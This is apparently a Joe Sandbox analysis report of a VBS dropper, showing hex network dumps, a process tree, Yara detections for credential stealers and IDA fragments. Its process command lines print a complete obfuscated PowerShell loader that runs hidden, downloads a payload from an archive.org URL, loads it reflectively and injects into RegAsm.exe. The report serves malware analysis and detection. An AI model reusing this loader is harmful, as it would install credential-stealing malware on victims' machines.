                                            2024-10-02 03:22:14 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                            2024-10-02 03:22:14 UTC1369INData Raw: 39 57 61 7a 4a 58 5a 32 42 53 65 30 6c 47 64 75 56 47 5a 4a 6c 48 62 69 31 57 5a 7a 4e 58 59 38 41 43 49 4b 30 67 50 69 41 6a 4c 78 49 53 50 75 39 57 61 7a 4a 58 5a 57 52 33 63 6c 5a 57 61 75 46 57 62 67 49 53 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 6d 63 31 4a 53 50 7a 35 47 62 74 68 48 49 35 78 6d 59 74 56 32 63 7a 46 47 50 4b 30 67 50 2f 49 79 63 6c 6c 6e 49 39 55 6d 62 76 78 57 59 6b 35 57 59 30 4e 48 49 69 67 54 4c 47 52 56 56 69 30 7a 5a 75 6c 47 5a 76 4e 6d 62 6c 42 69 49 77 34 53 4d 69 30 6a 62 76 6c 32 63 79 56 6d 64 67 77 57 62 34 39 44 50 2f 75 37 37 41 41 41 41 77 41 67 4c 41 41 44 41 75 41 41 4d 41 34 43 41 78 41 41 41 41 34 47 41 76 42 51 61 41 4d 48 41 79 42 51 5a
                                            Data Ascii: 9WazJXZ2BSe0lGduVGZJlHbi1WZzNXY8ACIK0gPiAjLxISPu9WazJXZWR3clZWauFWbgISM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHI5xmYtV2czFGPK0gP/IycllnI9UmbvxWYk5WY0NHIigTLGRVVi0zZulGZvNmblBiIw4SMi0jbvl2cyVmdgwWb49DP/u77AAAAwAgLAADAuAAMA4CAxAAAA4GAvBQaAMHAyBQZ
                                            2024-10-02 03:22:14 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                            2024-10-02 03:22:14 UTC1369INData Raw: 45 42 55 7a 67 53 55 42 43 78 4d 6f 45 41 41 53 42 74 4d 6f 45 41 41 53 42 64 4d 6f 45 52 4a 52 41 43 41 43 43 56 4d 6f 45 56 4d 6f 45 42 49 41 49 4a 67 41 30 42 4b 52 41 68 44 59 45 56 55 58 45 31 46 52 4b 44 4b 52 4a 44 4b 42 30 42 4b 52 49 44 4b 52 48 44 4b 52 42 64 6b 68 45 5a 4d 6f 45 56 4d 6f 45 56 4d 6f 45 4f 63 77 4b 39 4c 6f 45 42 43 6f 45 52 4a 52 41 44 41 79 43 74 4c 59 45 52 4d 59 45 52 4d 59 45 42 4d 41 49 4d 6f 51 2b 43 4b 52 41 43 41 79 42 35 4c 6f 45 47 51 51 39 43 4b 52 48 41 41 69 42 4e 4d 6f 45 42 4d 6f 45 42 41 41 43 46 43 6f 45 41 41 51 42 49 67 51 41 43 41 53 42 46 4d 59 45 41 41 53 42 4a 4d 6f 45 41 41 51 42 49 55 77 67 52 55 77 67 52 55 77 67 52 55 77 67 52 6b 68 45 5a 49 52 41 44 4b 52 2f 43 4b 52 67 41 4b 52 2b 43 4b 52 39 43 4b
                                            Data Ascii: EBUzgSUBCxMoEAASBtMoEAASBdMoERJRACACCVMoEVMoEBIAIJgA0BKRAhDYEVUXE1FRKDKRJDKB0BKRIDKRHDKRBdkhEZMoEVMoEVMoEOcwK9LoEBCoERJRADAyCtLYERMYERMYEBMAIMoQ+CKRACAyB5LoEGQQ9CKRHAAiBNMoEBMoEBAACFCoEAAQBIgQACASBFMYEAASBJMoEAAQBIUwgRUwgRUwgRUwgRkhEZIRADKR/CKRgAKR+CKR9CK
                                            2024-10-02 03:22:14 UTC1369INData Raw: 46 30 52 46 43 4b 52 42 64 34 77 42 48 38 41 43 56 49 6f 45 52 48 6f 45 46 30 52 46 43 4b 52 4e 43 4b 52 47 43 4b 52 42 64 67 77 42 57 77 68 41 42 41 43 42 41 47 6f 45 42 45 4f 67 52 55 42 43 63 34 51 48 53 49 41 49 47 67 41 67 42 4b 52 41 68 44 59 45 56 67 51 42 64 67 51 42 64 67 51 42 64 77 58 67 52 41 59 67 53 55 51 42 46 30 68 45 64 49 78 44 48 45 43 43 38 46 59 45 41 47 6f 45 41 47 6f 45 41 47 6f 45 41 47 6f 45 64 41 59 67 53 30 42 67 42 4b 52 48 41 47 6f 45 49 55 51 48 49 41 59 67 53 30 77 42 6c 67 51 42 64 49 77 42 46 67 51 67 43 4b 68 41 48 59 41 43 39 4a 6f 45 43 63 67 42 4f 45 51 5a 42 4b 52 46 4f 34 67 41 41 6f 41 43 35 4a 52 2b 42 4b 68 44 64 30 61 67 53 34 51 41 4e 4a 52 46 47 63 67 45 49 67 67 44 64 34 51 41 4e 4a 52 46 4f 67 67 44 4f 34 51
                                            Data Ascii: F0RFCKRBd4wBH8ACVIoERHoEF0RFCKRNCKRGCKRBdgwBWwhABACBAGoEBEOgRUBCc4QHSIAIGgAgBKRAhDYEVgQBdgQBdgQBdwXgRAYgSUQBF0hEdIxDHECC8FYEAGoEAGoEAGoEAGoEdAYgS0BgBKRHAGoEIUQHIAYgS0wBlgQBdIwBFgQgCKhAHYAC9JoECcgBOEQZBKRFO4gAAoAC5JR+BKhDd0agS4QANJRFGcgEIggDd4QANJRFOggDO4Q
                                            2024-10-02 03:22:14 UTC1369INData Raw: 34 51 41 4e 4a 52 46 4f 45 51 54 53 55 78 43 48 51 43 43 4f 45 51 34 41 47 52 46 41 46 6f 45 4f 34 51 41 4e 4a 52 46 41 46 6f 45 42 30 6b 45 56 59 77 42 5a 49 41 47 42 49 41 49 46 67 41 43 49 49 41 41 46 67 41 43 4f 30 42 43 4f 55 51 48 49 67 41 51 42 4b 42 43 49 55 51 48 46 30 42 4b 42 4b 68 44 6c 47 6f 45 59 34 41 51 42 4b 52 41 4e 4a 52 46 54 63 51 4a 44 34 51 41 41 51 41 43 44 30 78 41 64 67 67 44 64 4d 51 48 41 46 6f 45 4f 34 67 44 4f 34 67 44 64 34 67 44 41 46 6f 45 42 30 6b 45 56 41 78 42 66 67 67 44 49 34 41 43 46 30 52 42 64 34 41 43 48 77 41 43 4f 34 67 41 64 4a 52 46 4f 49 51 77 42 47 52 46 41 46 6f 45 4f 41 56 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 48 63 67 48 49 41 55 67 53 45 51 54 53 55 42 51 42 4b 68 44 4f 34 41 43 49 34 67 44 41 46 6f 45
                                            Data Ascii: 4QANJRFOEQTSUxCHQCCOEQ4AGRFAFoEO4QANJRFAFoEB0kEVYwBZIAGBIAIFgACIIAAFgACO0BCOUQHIgAQBKBCIUQHF0BKBKhDlGoEY4AQBKRANJRFTcQJD4QAAQACD0xAdggDdMQHAFoEO4gDO4gDd4gDAFoEB0kEVAxBfggDI4ACF0RBd4ACHwACO4gAdJRFOIQwBGRFAFoEOAVgS4AQBKRANJRFHcgHIAUgSEQTSUBQBKhDO4ACI4gDAFoE
                                            2024-10-02 03:22:14 UTC1369INData Raw: 51 49 43 4b 68 44 4f 34 67 44 42 30 6b 45 56 34 67 44 42 30 6b 45 56 34 51 41 4e 4a 52 46 4f 34 67 44 4f 41 55 67 53 45 51 54 53 55 52 49 48 67 46 43 49 34 51 48 41 46 6f 45 42 30 6b 45 56 41 55 67 53 34 67 44 63 67 52 2b 41 4b 42 48 35 44 6f 45 59 67 52 2b 41 4b 42 47 35 44 6f 45 68 45 52 2b 41 4b 42 47 63 67 41 47 59 67 41 47 68 45 42 48 49 67 42 43 59 67 51 57 53 67 41 43 70 46 6f 45 4f 34 51 70 42 4b 68 44 6c 47 6f 45 41 46 6f 45 42 30 6b 45 56 73 79 42 50 68 41 43 46 47 6f 45 49 55 59 67 53 45 51 42 41 77 41 43 44 30 52 42 64 34 41 42 48 67 51 57 53 6b 6c 45 43 49 41 41 48 67 77 41 64 4d 51 48 49 34 51 48 4f 30 42 43 4f 30 42 43 4f 30 42 43 6c 47 6f 45 64 55 61 67 53 30 68 44 4f 34 51 48 41 46 6f 45 4f 55 61 67 53 34 51 70 42 4b 68 44 6c 47 6f 45 5a
                                            Data Ascii: QICKhDO4gDB0kEV4gDB0kEV4QANJRFO4gDOAUgSEQTSURIHgFCI4QHAFoEB0kEVAUgS4gDcgR+AKBH5DoEYgR+AKBG5DoEhER+AKBGcgAGYgAGhEBHIgBCYgQWSgACpFoEO4QpBKhDlGoEAFoEB0kEVsyBPhACFGoEIUYgSEQBAwACD0RBd4ABHgQWSklECIAAHgwAdMQHI4QHO0BCO0BCO0BClGoEdUagS0hDO4QHAFoEOUagS4QpBKhDlGoEZ
                                            2024-10-02 03:22:14 UTC1369INData Raw: 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 50 63 77 4a 49 34 67 41 48 51 41 43 49 34 51 48 4f 34 67 44 64 59 77 42 4b 67 41 43 4f 30 68 44 4f 34 51 48 4f 34 41 43 48 77 51 42 42 6f 77 41 43 34 51 70 42 4b 68 41 67 63 41 43 49 34 51 48 41 46 6f 45 42 30 6b 45 56 41 55 67 53 34 51 42 64 55 51 48 4f 55 61 67 53 34 67 44 64 55 61 67 53 41 55 67 53 45 51 54 53 55 68 44 48 59 43 43 49 34 51 48 49 34 51 48 4f 30 68 44 4f 34 51 41 4e 4a 52 46 4f 30 68 43 48 51 42 43 4f 55 67 41 41 55 41 43 49 67 67 44 45 63 67 42 4f 30 66 67 53 45 41 49 47 6b 66 67 53 41 41 49 46 67 51 39 42 4b 52 41 67 59 51 38 42 4b 42 41 67 55 41 43 35 4a 52 2b 42 4b 42 43 4f 30 42 51 42 4b 52 39 42 4b 52 38 42 4b 52 37 42 4b 68 44 41 46 6f 45 42 30 6b 45 56 73 77 42 66 67 41 43 4f 30 78 41 64 34
                                            Data Ascii: gS4AQBKRANJRFPcwJI4gAHQACI4QHO4gDdYwBKgACO0hDO4QHO4ACHwQBBowAC4QpBKhAgcACI4QHAFoEB0kEVAUgS4QBdUQHOUagS4gDdUagSAUgSEQTSUhDHYCCI4QHI4QHO0hDO4QANJRFO0hCHQBCOUgAAUACIggDEcgBO0fgSEAIGkfgSAAIFgQ9BKRAgYQ8BKBAgUAC5JR+BKBCO0BQBKR9BKR8BKR7BKhDAFoEB0kEVswBfgACO0xAd4
                                            2024-10-02 03:22:14 UTC1369INData Raw: 4f 34 51 48 44 41 51 43 78 46 59 45 4f 45 41 41 47 67 41 43 4f 30 42 51 42 4b 52 41 4e 4a 52 46 4f 34 67 44 48 63 41 45 41 4d 52 41 54 45 41 49 47 41 77 45 43 45 41 49 46 6b 6c 45 49 45 41 41 46 45 77 45 41 4d 52 41 43 41 79 42 4f 45 53 45 43 30 6c 45 56 63 51 61 42 4b 42 41 67 55 51 62 42 4b 42 41 41 55 41 43 59 41 55 67 53 45 51 54 53 55 68 44 68 45 68 41 64 4a 52 46 41 46 6f 45 4f 34 67 44 59 6b 50 67 53 77 52 2b 41 4b 42 47 59 6b 50 67 53 67 52 2b 41 4b 52 49 52 6b 50 67 53 67 42 48 49 67 42 47 49 67 52 49 52 77 42 43 4f 45 53 45 43 30 6c 45 56 67 42 43 59 67 51 57 53 67 41 43 70 46 6f 45 41 46 6f 45 42 30 6b 45 56 63 79 42 53 42 77 45 42 55 57 67 53 55 52 41 42 41 69 43 49 46 6f 45 42 45 4f 67 52 55 42 43 49 46 6f 45 42 30 6b 45 56 63 41 43 49 46 6f
                                            Data Ascii: O4QHDAQCxFYEOEAAGgACO0BQBKRANJRFO4gDHcAEAMRATEAIGAwECEAIFklEIEAAFEwEAMRACAyBOESEC0lEVcQaBKBAgUQbBKBAAUACYAUgSEQTSUhDhEhAdJRFAFoEO4gDYkPgSwR+AKBGYkPgSgR+AKRIRkPgSgBHIgBGIgRIRwBCOESEC0lEVgBCYgQWSgACpFoEAFoEB0kEVcyBSBwEBUWgSURABAiCIFoEBEOgRUBCIFoEB0kEVcACIFo
                                            2024-10-02 03:22:14 UTC1369INData Raw: 59 41 42 45 4a 59 45 47 51 41 51 43 47 68 42 45 77 6a 67 52 59 41 42 34 49 59 45 47 51 41 43 4f 67 67 41 64 4a 52 46 42 41 51 43 4f 67 67 41 64 4a 52 46 4f 67 67 41 64 4a 52 46 42 41 67 44 4f 34 67 41 64 4a 52 46 41 41 41 43 4f 30 68 44 34 48 59 45 43 41 41 43 59 51 68 67 52 45 41 41 47 6f 41 45 59 49 67 41 41 59 41 47 4a 41 52 43 59 67 68 41 46 41 51 43 59 6b 51 43 59 6b 51 43 4f 67 78 42 41 6f 51 43 4a 6b 41 45 43 47 42 47 59 55 41 41 4b 51 52 41 4f 6b 51 43 4d 49 59 45 59 67 42 47 47 41 77 43 4a 30 68 45 4f 6b 77 41 41 63 41 49 43 47 68 41 4a 67 42 45 59 67 42 47 43 63 41 41 4e 6b 67 41 63 49 59 45 59 4d 41 41 49 67 41 45 49 67 42 4a 43 47 42 43 43 47 42 42 41 77 41 43 51 67 41 47 59 49 59 45 59 67 67 67 52 55 41 41 4e 41 41 41 41 30 43 42 41 41 41 41
                                            Data Ascii: YABEJYEGQAQCGhBEwjgRYAB4IYEGQACOggAdJRFBAQCOggAdJRFOggAdJRFBAgDO4gAdJRFAAACO0hD4HYECAACYQhgREAAGoAEYIgAAYAGJARCYghAFAQCYkQCYkQCOgxBAoQCJkAECGBGYUAAKQRAOkQCMIYEYgBGGAwCJ0hEOkwAAcAICGhAJgBEYgBGCcAANkgAcIYEYMAAIgAEIgBJCGBCCGBBAwACQgAGYIYEYgggRUAANAAAA0CBAAAA


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:23:22:05
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs"
                                            Imagebase:0x7ff78c0d0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:2
                                            Start time:23:22:06
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:23:22:06
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:23:22:08
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )"
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1595867471.000001A064DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1572696203.000001A05CEA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:23:22:14
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            Imagebase:0x6e0000
                                            File size:65'440 bytes
                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:23:22:14
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            Imagebase:0xd70000
                                            File size:65'440 bytes
                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:23:22:14
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            Imagebase:0x80000
                                            File size:65'440 bytes
                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:23:22:14
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            Imagebase:0x2c0000
                                            File size:65'440 bytes
                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:23:22:14
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            Imagebase:0x530000
                                            File size:65'440 bytes
                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Reset < >
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1622931535.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffb4b2b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                              • Instruction ID: c9d2ac754ca39b342a238bc7ddb5af754c786e7c44e567e6d2cf54bfe9a7bd00
                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                              • Instruction Fuzzy Hash: 1201677111CB0D8FD744EF0CE451AA6B7E0FB99364F50056DE58AC3661DA36E882CB45

                                              Execution Graph

                                              Execution Coverage:2.6%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:3
                                              Total number of Limit Nodes:0
                                              execution_graph 8660 7ffb4b2c34fd 8661 7ffb4b2c351f CreateProcessA 8660->8661 8663 7ffb4b2c3966 8661->8663

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1599175350.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffb4b2b0000_powershell.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: ae5942da1721b45a76f954f74d0813341366d8ebff9cfba01656a31b8fd30014
                                              • Instruction ID: 92e0e3c1c4fcad85fa62e44e143c95a18480d5cddb4c485b332a187f0a55e5f4
                                              • Opcode Fuzzy Hash: ae5942da1721b45a76f954f74d0813341366d8ebff9cfba01656a31b8fd30014
                                              • Instruction Fuzzy Hash: E4E15D70918A8D8FDBB8EF28C8597E977E1FB59301F10422ADC4ED7291DB749644CB81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
